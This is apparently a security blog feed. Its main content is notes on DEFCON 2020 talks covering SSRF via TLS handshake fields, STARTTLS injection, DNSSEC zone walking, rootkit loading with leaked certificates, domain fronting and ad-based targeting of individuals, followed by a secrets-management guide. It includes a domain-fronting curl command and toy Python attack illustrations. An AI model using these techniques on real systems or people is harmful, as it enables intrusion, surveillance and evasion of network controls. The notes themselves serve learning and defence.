Majority of IoT traffic is not encrypted; log messages &apos;encrypted&apos; with Base64... </li><li>An even easier MitM is to get a camera that becomes a super node in the P2P network... UIDs leaked, and not detectable to users.</li><li>Some of these issues are being fixed by vendors, or patches have been released, but it&apos;s unlikely users will patch.</li></ul><h3 id="online-ads-as-recon-and-surveillance-tool">Online ads as recon and surveillance tool</h3><p>This is a live talk in the crypto and privacy village.</p><p>Niel explores the possibility of using ad networks to harvest information about specific known targets.</p><ul><li>Previous research could use ads to tell if someone is blue team (with limitations) - for instance, take out ads against specific hashes found in malware, then see who makes the search</li><li>Trying to detect if it is possible to set up ads so they target a specific individual, and if so, whether it is practical to do so.</li><li>Scenario: Blue team user with a Nexus 6 Android and Windows 10 VM, Google/Chrome user. Doesn&apos;t clear cookies. Attacker has a domain name, blog, business for advertising, and some accounts and VMs.</li><li>Attacker puts some very specific search terms into a blog post (in this case, a bitcoin address, trojan string, with some other terms like NotPetya)</li><li>Attacker wants to detect user searches for specific terms - design an ad with select low-volume terms (but above the minimum threshold activity). Then narrow via demographics, but again not too narrow</li><li>Eventually the ad will show - if shown, the attacker gets the full text of the query that triggered the ad. </li><li>This is not all that viable - not able to do very low-volume terms, ads don&apos;t reliably display when you want, potential for higher cost.</li><li>Facebook allows much more detailed audience targeting, along with logical operators (AND/OR/XOR) - target interests, user data like life events, food/drink types, hobbies, etc. 
Behaviors are most invasive - online + offline data, OSes, purchase behavior, travel, multicultural affinities, expat status, drawing on data collected from user devices, location. When combined, these can target very specific audiences.</li><li>Using include/exclude rules with location, you can target, for instance, everyone who has recently been in the US Capitol building.</li><li>With Facebook - it didn&apos;t trigger for the intended target, but did trigger for other users.</li><li>Not fully proven, but it seems that it is possible to gather information about a specific person by using multiple methods like re-targeting, and highly specific targeting.</li><li>Defensive measures: Use opsec on search engines, be wary of data shared from devices (location on Android), etc.</li></ul><h3 id="hackium-browser">Hackium Browser</h3><p>I joined this talk by Jarrod Overson a little late (<a href="https://www.youtube.com/watch?v=VpLghyPdte0&amp;ref=nullsweep.com">video</a>). This is an incredibly interesting tool that looks like it can significantly help with JavaScript de-obfuscation, reverse engineering, and automatic manipulation of sites.</p><ul><li><a href="https://github.com/jsoverson/hackium?ref=nullsweep.com">Hackium</a> (and related tools) helps you to better understand how sites are using JS and the business logic built in. It&apos;s a Node.js library - can be installed with <code>npm install -g hackium</code></li><li>Hackium exposes a REPL. It&apos;s based on Puppeteer, so any commands for Puppeteer or Hackium work within it. REPL history is stored in .repl_history so it can be shared with others. This enables a nice ability to share cool manipulations of sites that goes beyond standard dev tool / proxy modifications. 
You can also use <code>hackium init</code> to create a shareable config file.</li><li>Designed so that supposedly human events (mouse, keyboard) are built to look human - mistakes, proper mouse movement, variable timings between key presses.</li><li>Can wire in captcha-solving services like 2captcha to auto-solve captchas that may block the tool.</li><li>Interceptors: templates to format JS or shift-refactor (transform nodes of a JavaScript syntax tree) - can be used to make JS more readable or dynamically change how the page works at load.</li><li>A cool demo that shows how to de-obfuscate JS by dynamically replacing the obfuscated code using shift-refactor.</li><li>A cool demo to find and expose internal JS functions on Twitter&apos;s page.</li></ul><h3 id="differential-privacy">Differential Privacy</h3><p>A talk by Miguel Guevara and Bryan Gipson about how to leverage and share useful data without compromising privacy.</p><ul><li>Google has made their <a href="https://github.com/google/differential-privacy?ref=nullsweep.com">differential privacy library</a> open source (the speakers are from Google)</li><li>Core problem: how do we publish data in a way that preserves individual users&apos; privacy?</li><li>Removing PII is not enough - published de-identified records could be reconstructed by combining them with other data sources.</li><li>Aggregation or k-anonymity (at least k users in a given data set) can help, but this may not be enough if stats change over time in ways that expose information, such as a single user moving from or to an aggregation bucket. This could also be a problem if the bucket is sensitive (like a medical condition). Published data may be subject to differencing attacks, knowing someone is part of a bucket may be a problem, and people could be exposed if known bad data is injected - like 100 users in a bucket with 99 fake users.</li><li>If we aggregate, but inject some randomness into each aggregate value - this is the differential privacy idea. 
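A minimal sketch of that idea in Python, assuming Laplace noise and a sensitivity of 1 (each person counted once per metric); the epsilon value is an arbitrary choice for illustration:

```python
import random

def noisy_count(true_count, epsilon=1.0, sensitivity=1.0):
    # Laplace(0, sensitivity/epsilon) noise, sampled as the difference
    # of two exponential draws (a standard way to get a Laplace variate).
    scale = sensitivity / epsilon
    noise = scale * (random.expovariate(1.0) - random.expovariate(1.0))
    return true_count + noise

# Publish a noisy value instead of the exact bucket count.
print(noisy_count(100))
```

Smaller epsilon means more noise and stronger privacy; the published number stays useful in aggregate while any single person's presence is masked.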
This maintains statistical significance without the above risks. </li><li>Practical aspects they take into account: a person can only be counted once in each metric, to avoid specific patterns (person A went to the grocery store 100 times today). Remove noisy metrics.</li><li>Built a differential privacy SQL engine, allowing querying a data set while maintaining privacy by applying per-user transformations that affect joins and aggregations. </li></ul><h2 id="friday-august-7th">Friday August 7th</h2><h3 id="when-tls-hacks-you">When TLS Hacks You</h3><p><a href="https://www.youtube.com/watch?v=qGpAJxfADjo&amp;ref=nullsweep.com">Video</a></p><p>An interesting expansion on SSRF that enables new techniques for weaponizing SSRF when it doesn&apos;t appear exploitable, leveraging TLS fields containing payloads. Talk by Joshua Maddux.</p><ul><li>The initial demo is interesting - localhost running memcache and making a simple curl request adds an attacker-controlled cache entry.</li><li>Turns out we can smuggle some data in the TLS handshake packets - SessionID (32b) and Session Tickets (65kb). These are saved between sessions to the same domain name (regardless of IP address). </li><li>Full attack: set up a site that crafts a handshake with the payload in one of the fields above, and DNS that flips between the actual site and localhost:port of a vulnerable service, like memcache. SSRF the app to have it create a TLS connection to the attacker site. Now, the server has cached the session information for the attacker site, but the next SSRF request has the DNS resolve to localhost.</li><li>The payload will be sent with the ClientHello to the localhost service as a result. 
The payload can include arbitrary characters like newlines, including memcached commands, de-serialization attacks, etc.</li><li>Vulnerable sites: Those that have SSRF (which may have previously been unexploitable, such as with webhooks), support TLS connections, and run services on local ports which accept unauthenticated TCP connections from localhost.</li><li>Services verified susceptible: memcached, hazelcast, SMTP, FTP, some DBs (maybe), syslog.</li><li>Demo of this technique using a phishing email + img tag on a page to get RCE on a developer laptop running a local Django app with memcached. Nice!</li><li>Defensive takeaway: proxy outbound requests from your infra, and don&apos;t run unauthenticated TCP software</li></ul><h3 id="finding-exploiting-bugs-in-multiplayer-game-engines">Finding &amp; Exploiting bugs in Multiplayer Game Engines</h3><p><a href="https://www.youtube.com/watch?v=4weoWSzuCxs&amp;ref=nullsweep.com">Video</a></p><p>I sometimes build small games in my spare time for fun (most recently, a VR mermaid adventure for my daughter) so I find this topic interesting. I no longer have time to devote to most multiplayer-style games, but I used to enjoy them. This talk by Jack Baker covers mostly specific engine bugs that were discovered and fixed (except for Bug4).</p><p><a href="https://github.com/qwokka/defcon28?ref=nullsweep.com">Proof of concepts for each</a></p><ul><li>Looking at UNET (Unity networking library, deprecated, no alternatives, lots of indie games use it)</li><li>Multiplayer games generally use a distributed architecture with RPCs to communicate, with state replicated in both the client and server. 
Most games use UDP (websocket for browser games), so the protocol has to deal with auth &amp; ordering issues.</li><li>Bug1: UE4 uses specialized &quot;URL&quot;s to communicate, which sometimes include file names, allowing LFI, including remote SMB (fixed in UE4.25.2)</li><li>Bug2: UNET / Unity, memory disclosure by sending a packet with a length field &gt; data sent - UNET will read in other memory, which works similarly to Heartbleed (chat messages can leak memory data back to us via this method). Fixed in 1.0.6</li><li>Bug3: UE4 universal speed hack. UE4 checks the timestamp sent for movement against the last known valid timestamp seen from the player. These values are floating points, which given certain operations can become NaN (Not a Number): NaN poisoning. Since operations are via RPC, we can include NaN as our timestamp argument, and the checking function treats the timestamp as valid. The NaN value propagates after a few requests until the server can no longer determine whether the client is modifying the time, allowing move speed changes. Interesting! </li><li>Bug4: UNET session hijacking. Packets aren&apos;t validated by source IP - only by values within the packet: hostID, SessionID, and packetID. HostIDs are assigned sequentially. Session IDs are randomly generated at connection (16 bit) - brute-forceable. PacketID is also 16 bits, incremented with each packet. A guess can lead to discarding the packet, accepting it (correct guess), or disconnecting the session (too high) - which can kick other players. Not fixed, and unlikely to be fixed in the future - it&apos;s an architectural issue. 
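The Bug3 NaN trick works because every comparison against NaN is false, so a toy check like the one below (hypothetical, not actual UE4 code) never rejects it:

```python
# Naive server-side movement check: reject timestamps that are too old
# or too far in the future. NaN compares false to everything, so it
# slips past both branches.
def timestamp_looks_valid(new_ts, last_valid_ts, max_skew=5.0):
    if new_ts < last_valid_ts:             # too old?
        return False
    if new_ts > last_valid_ts + max_skew:  # too far ahead?
        return False
    return True

print(timestamp_looks_valid(float("nan"), 1000.0))  # True
```

The robust form is to test the accepting condition explicitly (e.g. <code>last &lt;= new &lt;= last + skew</code>), which NaN fails.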
Bug4 can be limited with encryption, but encryption is not commonly used.</li></ul><h3 id="detecting-fake-4g-base-stations-in-real-time">Detecting Fake 4G Base Stations in Real Time</h3><p><a href="https://www.youtube.com/watch?v=siCk4pGGcqA&amp;ref=nullsweep.com">Video</a> </p><p>I recently wrote about <a href="https://nullsweep.com/government-surveillance-of-protestors/">government surveillance of protests</a>, including the use of stingrays (fake cell towers) to track protestors. </p><p>This talk by Cooper Quintin focuses on detecting devices that spoof a 4G tower.</p><ul><li>As I wrote previously, StingRay devices generally depend on older 2G network protocols to work. For 4G surveillance (HailStorm), EFF looked at changes in the standard: mutual authentication, better encryption, and in 4G the device no longer naively connects to the strongest tower. (These are what make it difficult to spoof for surveillance)</li><li>Vulnerabilities in 4G leveraged: pre-auth handshake attacks and downgrade attacks - initial setup methods are implicitly trusted. Recommend the <a href="https://www.eff.org/wp/gotta-catch-em-all-understanding-how-imsi-catchers-exploit-cell-networks?ref=nullsweep.com">Gotta Catch em All IMSI paper</a> by EFF for details.</li><li>The initial (before the auth handshake occurs) 4G connection requests include some sensitive information such as the IMSI, sometimes GPS coords, and the ability to attempt to downgrade the connection to 2G.</li><li>Data on how often these devices are used - the ACLU published FOI request data showing hundreds or thousands of uses per year by both ICE/DHS and local law enforcement.</li><li>Evidence that foreign spies (deployed around DC / the White House), criminals (drug cartels), and cyber mercenaries (NSO Group) leverage these technologies.</li><li>Current detection methods: apps (many false positives). 
Custom hardware based on radio (expensive, requires setup).</li><li>Real-life testing looking for cell simulators at Standing Rock found no 2G, so it is assumed that all uses must be 4G.</li><li>Releasing the <a href="https://github.com/EFForg/crocodilehunter?ref=nullsweep.com">Crocodile Hunter</a> software stack - runs on a laptop or Pi with SDR &amp; LTE antennas.</li></ul><h3 id="starttls-is-dangerous">STARTTLS is Dangerous</h3><p>This is a live crypto village talk. <a href="https://youtu.be/fvpWEzOOaRA?t=1602&amp;ref=nullsweep.com">Video bookmark to stream</a>.</p><ul><li>STARTTLS is most commonly used with email clients and servers - all email protocols support it. The web generally uses implicit TLS.</li><li>If a client supports downgrading to plaintext when STARTTLS is not supported, then an active attacker can just claim that it isn&apos;t supported, and the client will connect anyway.</li><li>IMAP alerts can be sent at any time (including during the plaintext pre-TLS communication), and the client will show them as coming from the server.</li><li>Buffering bugs (CVE in 2011, but attacks not published at the time): If the client sends multiple plaintext packets prior to the handshake, most servers will process the plaintext packets in the TLS session.</li><li>If an attacker (MitM for SMTP) sends plaintext with injected Auth, Mail, and Data commands - the server will then go through the auth with the client, and the client can be forced to send credentials to the attacker.</li><li>Similar attack with IMAP, but it requires the exact size ahead of time (so need to guess the size of the password), though the attacker may be able to get multiple tries.</li><li>The bug was discovered in 2011, but is still prevalent in 1.5% of SMTP servers, 2.6% of POP3 servers, and 2.4% of IMAP servers.</li><li>We can trigger the same type of bug on the client by sending the client plaintext appended to the STARTTLS response, and the client will think it is part of the TLS session (called Response Injection). 
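The server-side buffering bug above can be sketched as a toy parser (heavily simplified and hypothetical - real servers read from a socket, and the TLS handshake is elided entirely):

```python
# Toy sketch of the STARTTLS buffering bug: bytes an attacker appends
# after the STARTTLS command survive the handshake and get processed
# as if the authenticated client sent them inside TLS.
def buggy_server(raw_bytes):
    leftover = raw_bytes.split(b"STARTTLS\r\n", 1)[1]
    # BUG: leftover plaintext should be discarded before the handshake,
    # but instead it is replayed into the "secure" session.
    return [line for line in leftover.split(b"\r\n") if line]

injected = buggy_server(b"EHLO mail\r\nSTARTTLS\r\nMAIL FROM: attacker@evil.test\r\n")
print(injected)  # [b'MAIL FROM: attacker@evil.test']
```

The fix is simply to clear any buffered plaintext when STARTTLS is processed.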
Response injection is not very severe, but could be used to spoof mailbox content.</li><li>More than half of mail clients tested were vulnerable!</li><li>Other issues too - an IMAP server can start a session in PREAUTH, meaning no auth is required, and STARTTLS says it cannot be used in the authenticated state - so clients may need to disconnect. If the attacker also does a mailbox referral to an attacker-controlled server, this could send credentials to the attacker. Only 1 client (Alpine) was vulnerable to this, because most clients don&apos;t support referral.</li></ul><h3 id="android-bug-foraging">Android Bug Foraging</h3><p>This is a live session, <a href="https://www.youtube.com/watch?v=qbj-4NXsE-0&amp;ref=nullsweep.com">recording here</a>.</p><p>The talk covers several standard Android application vulnerabilities, including some interesting ones!</p><ul><li>Process: List exported activities (reachable by other apps) and broadcast receivers, reverse the APK, and test the behavior and actions</li><li>Map out classes that handle specific intents / actions, and see if we can pass data into those that can modify the code execution path.</li><li>Google Camera vulns: Take a photo without user action, even if the smartphone is locked. A rogue app could invoke those capabilities without the normal camera permissions. POC app called spyxel that mutes volume, takes photos from the camera, reads the proximity sensor and GPS history, lists/downloads SD files, and auto-records calls (fixed by Google).</li><li>Samsung Find My Mobile vulns: loads the <code>/sdcard/fmm.prop</code> file, which a malicious app can create, passing it a malicious URL. There are also broadcast receivers not protected by any permission, which will load the specified file. Several vulns of this nature combined allow user monitoring, erasing data, retrieving call/sms logs, etc. 
</li></ul><h3 id="a-lesson-in-privacy-engineering">A Lesson in Privacy Engineering</h3><p>This is a live talk</p><p>This talk covers privacy risks with the Norwegian Covid tracking applications, which didn&apos;t do a great job protecting user privacy.</p><ul><li>Centralized solutions can lead to abuse - future nefarious use of the saved data, mining the data for purposes other than stated.</li><li>Privacy-first contact tracing could have been used: Alice&apos;s phone broadcasts a new message every few minutes - Bob receives the messages of every person he is near (including Alice) -&gt; Alice gets Covid, then uploads her list of messages and timestamps -&gt; Bob can download the list and check his own contact history against it.</li><li>Problems with this implementation: data could be modified before uploading to the central server, and it required a phone number to use the app. </li><li>An expert group was pulled in to publish an open report on privacy (with full access to source). 5 days of analysis and a preliminary report showed no deletion or anonymization implemented, scalability issues, permanent device-specific identifiers stored, lack of data validation.... plenty of issues found.</li></ul><h2 id="thursday-august-6th">Thursday August 6th</h2><h3 id="discovering-hidden-properties-to-attack-the-node-js-ecosystem">Discovering Hidden Properties to Attack the Node.js Ecosystem</h3><p><a href="https://www.youtube.com/watch?v=oGeEoaplMWA&amp;ref=nullsweep.com">Video of talk</a></p><p>As a sometimes user of Node.js for a variety of things, I wasn&apos;t aware of this specific vulnerability in JS. Feng Xiao clearly shows some interesting attacks.</p><ul><li>Attack vector: De-serialization from querystrings or objects. When a function expects a JSON object and assigns values improperly, attackers can inject key/value pairs to overwrite internal variables, including object prototypes (such as a constructor). 
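The pattern translates to almost any dynamic language. A toy Python analogue (names and classes hypothetical - the real attacks here target JavaScript merges like Object.assign):

```python
# Vulnerable pattern: blindly assigning every user-supplied key onto an
# object lets an attacker overwrite internal "hidden" properties.
class User:
    def __init__(self, name):
        self.name = name
        self.is_admin = False  # internal flag developers assume is trusted

def update_profile(user, fields):
    for key, value in fields.items():
        setattr(user, key, value)  # no allowlist of permitted fields

u = User("alice")
update_profile(u, {"name": "alice2", "is_admin": True})  # injected key
print(u.is_admin)  # True
```

The fix is the same in every language: merge only an explicit allowlist of fields.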
Properties are generally considered trusted by developers.</li><li>Code may be vulnerable when using functions <em>like</em> Object.assign to assign all input values to an object, or other merging functions.</li><li>This is similar to Mass Assignment risks in Ruby or Object Injection in PHP.</li><li>Found 13 0-days in a variety of libraries (SQL injection, ID forging, input validation bypass, etc.). Five of the libraries have more than 1M monthly downloads, including MongoDB &amp; mongoose. </li><li>Node.js vulnerabilities impact both Node web apps and desktop Electron apps.</li><li>Some cool examples of web framework login bypass &amp; SQL injection using this technique.</li><li><a href="https://github.com/xiafen9/Lynx?ref=nullsweep.com">Lynx</a> is an open-source tool developed to identify and generate exploits for hidden properties.</li></ul><h3 id="dnssec-walks">DNSSEC walks</h3><p><a href="https://www.youtube.com/watch?v=q1cnsIM1w7c&amp;ref=nullsweep.com">video</a></p><p>This was a good talk by Hadrien Barral &amp; R&#xE9;mi G&#xE9;raud-Stewart. I always like to learn new ways to enumerate DNS entries. Emails are an interesting use case.</p><ul><li>Cloud providers often implement email redirection for clients by including a DNS TXT record, which can be queried to find the &apos;true&apos; private email of the user. Tools can check DNS records for common emails or emails harvested from sites: <code>dig TXT ${email} +noall +answer</code></li><li>DNSSEC offers a cert chain of trust, which can be queried using <a href="https://dnsviz.net/d/defcon.org/dnssec/?ref=nullsweep.com">dnsviz</a>. 
The tool also shows DNS errors, which can be interesting (including for defcon.org!)</li></ul><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://nullsweep.com/content/images/2020/08/DEFCON.org-DNS-errors-1.png" class="kg-image" alt="DEFCON 2020 Live Notes" loading="lazy"><figcaption>DEFCON DNS errors</figcaption></figure><ul><li>Issue with DNSSEC: negative responses, since you can&apos;t authenticate every non-existent subdomain. NSEC solves this by signing intervals for which no domain exists. For example, if there is no domain between <code>apple.example.com</code> and <code>carrot.example.com</code>, then we know that <code>bad.example.com</code> does not exist.</li><li>We can use this to enumerate hidden records for zones that use NSEC. Run a query for a random name such as <code>fgfrd.example.com</code>; response: nothing between carrot.example.com and good.example.com. Now we can repeat with gooda.example.com and loop to enumerate. However, NSEC is no longer used...</li><li>NSEC3 was created to prevent this issue using hashed values. We can use the same technique to dump all the hashes of real records (giving a count of all records and, commonly, SHA1 hashes of all valid records).</li><li>hashcat was able to break them (on a single high-end GPU) for 88% of 16,000 records. 75% resolved to interesting email redirection, 13% something else.</li><li>Stats: Most web owners used Gmail, and about 50% of those users included their name in the email. 
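The NSEC enumeration loop described above can be sketched against a mocked oracle (the zone is a plain Python list - no real DNS queries are made):

```python
import bisect

zone = sorted(["apple", "carrot", "good", "zebra"])  # hidden records to recover

# NSEC-style denial: return the pair of existing names bracketing qname.
def nsec_interval(qname):
    i = bisect.bisect_left(zone, qname)
    prev = zone[i - 1] if i > 0 else zone[-1]
    nxt = zone[i] if i < len(zone) else zone[0]
    return prev, nxt

def walk_zone():
    found = set()
    cursor = "0"  # any name sorting before the first real record
    while True:
        prev, nxt = nsec_interval(cursor)
        if nxt in found:
            return found  # wrapped around: whole zone enumerated
        found.update((prev, nxt))
        cursor = nxt + "!"  # a name sorting immediately after nxt
```

Each denial response leaks two real names, so the whole zone falls out in a handful of queries.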
66% of those users did not show their email on the website, and 45% of those emails did not appear in a Google search - so some private emails were harvested.</li><li>Fix: Configure NSEC3 with ECDSA signing</li></ul><h3 id="demystifying-modern-windows-rootkits">Demystifying Modern Windows Rootkits</h3><p><a href="https://www.youtube.com/watch?v=1H9tEfkjFXs&amp;feature=youtu.be&amp;ref=nullsweep.com">Video</a></p><p>I really liked this talk - <a href="https://billdemirkapi.me/?ref=nullsweep.com">Bill Demirkapi</a> explains rootkits and Windows internals really well. I don&apos;t have much background with Windows internals or rootkits, so I learned a lot!</p><ul><li>Kernel drivers have significant privileges, are given high trust by anti-virus, and are easier to hide than other forms of malware.</li><li>Loading a rootkit: abuse legitimate drivers - lots of known &apos;vulnerable&apos; drivers (which require admin privileges): Capcom anti-cheat, Intel NAL. Downside of this method: poor compatibility across Windows versions &amp; general instability of the system as a result.</li><li>Loading a rootkit: buy a cert! OK for targeted attacks, but can reveal your identity or have the cert blacklisted.</li><li>Loading a rootkit: abuse a leaked certificate - most of the benefits of a legit one (and they can often be found on game hacking forums), but newer certs can&apos;t be used on Secure Boot machines with Win10. (The kernel doesn&apos;t usually care if certs are revoked or expired). </li><li>Finding certs - a <a href="https://buckets.grayhatwarfare.com/?ref=nullsweep.com">Grayhat Warfare</a> S3 search for pfx or p12 extensions found 6k+ certs.</li><li>Rootkit network communications: C2 server, direct port connection, hook into a specific application communication channel.</li><li>Instead of directly hooking into a specific application, this technique hooks the entire host network (like Wireshark) and monitors all packets for a malicious magic constant from the C2 server. 
The C2 server can then send data on any valid port.</li><li>Hooking into the network user space events: create custom device and driver objects to hook into File objects. A lot of really interesting Windows-internals specifics are discussed in the talk.</li><li><a href="https://github.com/d4stiny/spectre?ref=nullsweep.com">Spectre rootkit</a> created to demonstrate this method.</li></ul><h3 id="hacking-the-supply-chain">Hacking the Supply Chain</h3><p><a href="https://www.youtube.com/watch?v=wHsjf2mAHIM&amp;ref=nullsweep.com">Video</a></p><p>This video is specifically about maximizing vulnerability value by focusing research efforts on lesser-known components that are generic and supplied to many end products. In this case, the Treck TCP/IP stack, which is used in hundreds of millions of embedded devices.</p><ul><li>Due to the nature of the end products (IoT, embedded devices, medical devices), vulnerabilities are unlikely to be patched. End users won&apos;t have good visibility into the vulnerability source (Treck), and some products with the vulnerability are no longer supported.</li><li>In total, 19 vulnerabilities were found in Treck, including 4 RCEs.</li><li>The main attack is based on the DNS resolver, and can traverse NAT boundaries.</li><li>The Treck DNS resolver has a function that calculates size, then allocates a buffer. However, the size function misses a few critical checks: it does not validate which characters are allowed in domain names, and does not enforce the RFC maximum of 255 characters per domain name. It uses an unsigned short int while calculating a given record length (64k). 
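The unsigned short is the whole bug: summing record lengths in 16 bits wraps at 65,536, so the allocated buffer ends up smaller than the data copied into it. A toy sketch (hypothetical numbers, not Treck's actual code):

```python
# Record lengths summed in unsigned 16-bit arithmetic wrap at 65536.
def alloc_size(record_lengths):
    total = 0
    for n in record_lengths:
        total = (total + n) & 0xFFFF  # unsigned short truncation
    return total

records = [40000, 32000]                  # 72000 bytes of attacker data
print(sum(records), alloc_size(records))  # 72000 6464 -> heap overflow
```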
I know where this is headed now :)</li><li>Max DNS packet size is 1460 bytes, but embedded compression can be used to increase that beyond the integer max (72k).</li><li>This can be used for RCE on all DNS query types by including the specially crafted name in a CNAME record.</li><li>The device they tested (a UPS) has no ASLR or DEP, and is highly similar to the x86 architecture.</li></ul><h3 id="long-live-domain-fronting-on-tls-1-3-">Long live Domain Fronting (on TLS 1.3)</h3><p><a href="https://www.youtube.com/watch?v=TDg092qe50g&amp;ref=nullsweep.com">video</a></p><p>Privacy is one of my core concerns, so I am always interested in ways to enhance it. This talk discusses how to use domain fronting with TLS 1.3 to bypass network controls and censorship, after previous techniques were mostly halted.</p><p>The demo by Erik Hunstad is impressive, with interesting tools that demonstrate a setup that bypasses network filters and censorship.</p><ul><li>Domain fronting: Avoid network defenses or censorship by connecting to an innocuous domain while hiding the true destination (that may be banned or suspicious). Big restriction: the fronted domain and fronting domain must be on the same service (usually a CDN)</li><li>Domain fronting primer: request to HostA with the Host header pointing to HostB: <code>curl -s -H &quot;Host: hidden.domain.com&quot; -H &quot;Connection: close&quot; &quot;https://fronteddomain.com/resource_on_hidden.domain.com&quot;</code></li><li>This worked great until 2018, when the Russian government put pressure on cloud environments to stop it in order to block the Telegram messenger app. AWS, Google and CloudFlare stopped it. Azure still allows it at the moment.</li><li>TLS 1.3 method: a TLS 1.3 connection with ESNI is sent to any Cloudflare server. An HTTP request is sent using that connection with any Host header. SNI can be included as well; it doesn&apos;t have to match the ESNI. 
Cloudflare will forward to the true destination, as long as the destination&apos;s DNS is provided by Cloudflare.</li></ul><pre><code>TLS 1.3
GET / HTTP/1.1
Host: hackthis.computer
-----------------------------&gt; Any cloudflare IP ---&gt; hackthis.computer
ESNI: hackthis.computer
SNI: can-be-anything.com</code></pre><ul><li><a href="https://github.com/SixGenInc/Noctilucent?ref=nullsweep.com">Noctilucent</a> &#xA0;project Go crypto/tls rewrite which demonstrates domain hiding, with plenty of options.</li><li>Currently 21% of top 100k sites available for this on cloudflare.</li><li>Most traffic filtering is done on the SNI field, which this technique easily defeats.</li><li>What about HTTPS decrypting firewalls with root certs? Test firewall with TLS 1.3 decryption, setup with no exemptions. However, some exemptions are built in due to things like cert pinning on major sites - fronting with mozilla.org bypasses firewall, but does show up in logs.</li><li>What if it&apos;s setup with websockets? Creates only a single connection but also bypasses firewall controls (using <a href="https://github.com/cbeuw/Cloak?ref=nullsweep.com">Cloak</a> project to leverage websocket tunneling)</li><li>Blue team defenses: block or flag ClientHello packets that contain both <code>server_name</code> and <code>encrypted_server_name</code> or see if there are strange traffic patterns to specific sites. </li></ul>]]></content:encoded></item><item><title><![CDATA[Secrets Management for Developers]]></title><description><![CDATA[Best practices for managing secrets when building and deploying applications.]]></description><link>https://nullsweep.com/secrets-management-for-developers/</link><guid isPermaLink="false">5f0f2705fec4c205157621bd</guid><category><![CDATA[DevSecOps]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Wed, 15 Jul 2020 22:34:05 GMT</pubDate><media:content url="https://nullsweep.com/content/images/2020/07/secret_management_best_practices.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://nullsweep.com/content/images/2020/07/secret_management_best_practices.jpg" alt="Secrets Management for Developers"><p>One thing that comes up frequently in security is how to deal with application secrets. 
There are many methods for managing secrets, from hard coding them into source code, to environment variables, to using a credential manager.</p><p>In this post, I&apos;ll go through some Do&apos;s and Don&apos;ts for managing secrets securely, both for web services and for client applications like mobile apps that need embedded API keys.</p><h2 id="the-best-practices-for-managing-secrets">The Best Practices for Managing Secrets</h2><p>If you just want to go straight to the most secure practices, here they are.</p><ul><li>Don&apos;t store any secrets on client applications or devices. If you need something like an auth token for a service, generate one token per user or device, and treat it as you would a user password.</li><li>Use a secret manager like <a href="https://www.vaultproject.io/?ref=nullsweep.com">Hashicorp Vault</a>, <a href="https://aws.amazon.com/secrets-manager/?ref=nullsweep.com">AWS Secrets Manager</a> or other platform-specific credential management technology like <a href="https://kubernetes.io/docs/concepts/configuration/secret/?ref=nullsweep.com">kubernetes secrets</a>. Store all secrets here: API keys, service passwords, secret keys, etc.</li><li>Vault access should use a management system (IAM for AWS or the platform equivalent). If IAM solutions aren&apos;t available, use a CI/CD system to encrypt the vault credentials and inject them at deployment. The credentials themselves can be stored in the Vault and rotated by the vault admins.</li><li>Create separate sets of credentials for production at a minimum, ideally for each environment.</li></ul><p>This does require running a separate piece of infrastructure (the vault), generally means more complex code has to be written to retrieve secrets, along with all the various failure modes that might be encountered, and ties your application more closely to the hosting solution. 
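In application code, the environment-injection pattern described above usually reduces to reading the process environment and failing fast when a secret is absent, rather than silently falling back to a hard-coded default. A minimal sketch — the `get_secret` helper and the `DB_PASSWORD` name are hypothetical, not from any particular vault SDK:

```python
import os

def get_secret(name: str) -> str:
    """Return a secret injected at deploy time (by CI/CD or a vault sidecar).

    Raising immediately on a missing secret beats limping along with a
    default or empty credential.
    """
    value = os.environ.get(name)
    if value is None:
        raise RuntimeError(f"Missing required secret: {name}")
    return value

# The deploy step would have exported DB_PASSWORD before startup:
# db_password = get_secret("DB_PASSWORD")
```

Keeping this one small function as the only way secrets enter the application also makes it easy to later swap the environment lookup for a real secret-manager client without touching call sites.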
Not all organizations or teams are willing to do everything here.</p><h2 id="slightly-less-secure-but-still-pretty-good-secret-management-">Slightly Less Secure, but Still Pretty Good, Secret Management.</h2><p>For some systems, the overhead of maintaining a vault is too great. You can get most of the way there by managing credentials in a CI/CD pipeline and injecting them into the deployment environment. You can do this a few ways - by having a build step that injects encrypted credentials into a file (preferred), or directly setting environment variables on deploy (only if a file won&apos;t work for some reason, to avoid accidental disclosure of environment variables from things like phpinfo).</p><p>Alternatively, if not using a CI/CD platform, have the production support team deploy environment variables or update credential files manually on production systems. Ensure that separate passwords are used in each environment.</p><h2 id="don-t-do-these-things">Don&apos;t Do These Things</h2><p>Here&apos;s a handy list of things to avoid doing where possible. </p><ul><li>Don&apos;t store credentials in your source code management system, like GitHub, even if it is internal or private. It&apos;s hard to remove them from the history and too easy to leak.</li><li>Don&apos;t use the same set of credentials or API keys in production and other environments. Keep production credentials limited to a very small set of owners.</li><li>Don&apos;t give everyone read access to a credential store. Instead, use granular control, so users can only see credentials they reasonably need.</li><li>Don&apos;t put secrets in client applications. Every secret on a client can (and likely eventually will) be found and made public. This includes encryption keys, API keys, database credentials, and anything else that you wouldn&apos;t want users having access to. 
<br><br>Client applications include front end JavaScript on a web page, downloadable binaries, and mobile applications.</li><li>Don&apos;t share credentials between different production systems (have separate API keys, passwords, user accounts, etc. for every application)</li></ul><h2 id="conclusions">Conclusions</h2><p>Managing secrets is hard, which is why searching for &quot;credential leaks&quot; finds multiple recent news stories of data breaches, ransoms, and other problems from mismanaging credentials.</p><p>Though it can be involved to get to the best practices, every step in that direction helps!</p>]]></content:encoded></item><item><title><![CDATA[Government Surveillance of Protestors]]></title><description><![CDATA[Modern anti-protester tactics include many things: cell phone monitoring, communications disruptions, social media blocking, social media monitoring...]]></description><link>https://nullsweep.com/government-surveillance-of-protestors/</link><guid isPermaLink="false">5edd37dec049fc234ea58fa5</guid><category><![CDATA[Privacy]]></category><dc:creator><![CDATA[Charlie Belmer]]></dc:creator><pubDate>Tue, 09 Jun 2020 22:13:00 GMT</pubDate><media:content url="https://images.unsplash.com/photo-1573511860313-d333c8022170?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" medium="image"/><content:encoded><![CDATA[<img src="https://images.unsplash.com/photo-1573511860313-d333c8022170?ixlib=rb-1.2.1&amp;q=80&amp;fm=jpg&amp;crop=entropy&amp;cs=tinysrgb&amp;w=2000&amp;fit=max&amp;ixid=eyJhcHBfaWQiOjExNzczfQ" alt="Government Surveillance of Protestors"><p>Governments around the world continue to ramp up surveillance of protests and civil unrest. 
